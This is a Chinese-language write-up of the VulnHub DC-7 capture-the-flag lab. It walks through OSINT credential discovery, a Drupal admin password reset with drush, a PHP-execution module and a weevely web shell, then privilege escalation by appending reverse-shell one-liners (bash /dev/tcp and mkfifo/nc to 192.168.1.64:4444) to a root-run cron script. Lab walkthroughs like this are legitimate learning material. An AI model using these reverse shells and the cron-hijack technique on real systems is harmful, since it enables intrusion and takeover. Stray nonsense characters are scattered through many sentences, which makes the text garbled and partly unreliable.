vulnhub DC-7
信息收集
先查看開放端口,發(fā)現(xiàn)80端口和22端口是開放的,說明可能是拿到web權(quán)限后ssh上去。
根據(jù)版本去查看相關(guān)的漏洞
提示說沒有漏洞可能修復(fù)了,再結(jié)合作者在主頁給的提示。
也不是用密碼爆破的方法去獲得web權(quán)限,然后我就去搜索了下DC7發(fā)現(xiàn)這是作者的一個腦洞乘寒。。匪补。
在底部有一個@DC7USER的用戶去github上或者google上進(jìn)行搜索下可能會有收獲
再去把文件看一看找到密碼伞辛。。夯缺。
去web界面上登錄一下發(fā)現(xiàn)失敗了蚤氏。。踊兜。
但根據(jù)說明肯定就是他了竿滨,然后就去ssh嘗試一下。
登錄成功捏境,但是他也沒有什么權(quán)限于游,查看他地下的mbox文件發(fā)現(xiàn)是一封郵件。
應(yīng)該是運行cron任務(wù)垫言,運行/opt/scripts/backup.sh這個腳本去執(zhí)行的贰剥。
可惜這個腳本對于現(xiàn)在的用戶而言是只讀的,但是對于root用戶和www-data用戶是可以進(jìn)行編輯的
我們就得想辦法先切換到www-data用戶筷频,辦法是修改網(wǎng)站的admin用戶蚌成,這個用戶在之前找回密碼的步驟有發(fā)現(xiàn)他的存在。
對于admin用戶的切換方法可以參考下面的文章:
[Drupal] https://www.isfirst.net/drupal/drupal-reset-password Drupal忘記管理密碼重置管理密碼的四種方法(Drupal8/Drupal9)
嘗試第一種drush凛捏,發(fā)現(xiàn)可以使用drush命令
修改密碼成功担忧。
獲取webshell
在進(jìn)到后臺轉(zhuǎn)了一圈后沒有什么發(fā)現(xiàn),而且對于這個系統(tǒng)的了解太少了坯癣,去google上看了大佬的wp瓶盛,了解到原來可以上傳一個模塊運行php代碼。
[DC-7] https://www.hackingarticles.in/dc7-vulnhub-walkthrough/ walkthrough
下載插件完成,并且安裝成功
打開這個插件成功惩猫。
已經(jīng)可以運行php code了窒所,運行weevly去生成一個php shell,并且上傳帆锋,再利用weevly連接shell成功!
然后就需要往文件中寫入bash命令禽额,但是利用vi好像交互有問題寫不了锯厢。
利用echo的方法去寫入文件嘗試
上網(wǎng)搜索后發(fā)現(xiàn)有兩種方法去寫
echo "bash -i >& /dev/tcp/192.168.1.64/4444 0>&1" >> /opt/scripts/backups.sh
?
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.64 4444 >/tmp/f" >> backups.sh
利用用戶dc7user進(jìn)行檢查寫入成功(我第一次寫錯了ip。脯倒。实辑。)
耐心等待可能運氣不好需要十五分鐘,最終獲得成功T宥剪撬!
